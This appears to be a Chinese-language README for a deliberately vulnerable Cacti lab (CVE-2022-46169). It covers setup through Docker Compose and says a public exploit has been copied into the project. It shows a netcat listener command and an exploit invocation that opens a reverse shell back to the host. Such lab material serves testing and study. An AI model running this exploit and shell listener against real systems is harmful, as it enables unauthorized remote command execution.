这是一个用于测试 Cacti 漏洞(CVE-2022-46169)利用的易受攻击应用。
此应用包含严重的安全漏洞。运行风险自负!建议在备份且隔离的环境(如已创建近期快照并仅使用主机网络模式的虚拟机)中运行。请勿将此应用部署到任何面向互联网的服务器,否则它们将被攻破。
免责声明:本人对任何人使用此应用的方式概不负责。此应用的唯一用途是作为 CVE-2022-46169 漏洞利用的测试场景,不得恶意使用。如果您的服务器因安装此应用而被攻破,责任不在于我,而在于上传并安装它的人员。
以下是 搭建 环境的步骤:
docker compose up -d 启动容器组。admin/admin。容器将命名为 vuln-cacti。
拆除 环境请使用 docker compose down 命令。
Cacti 官方安装指南可在此处找到 这里。
漏洞的详细根本原因可见 这里。
公开的漏洞利用可在 Exploit-DB 获取。为方便起见,已复制到 exploit/ 目录下。
运行方法:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
提示:host.docker.internal 用于从容器访问宿主机(参考)。vulhub 仓库 中也包含该漏洞的条目。
本项目采用 Unlicense 许可证 - 详见 LICENSE 文件。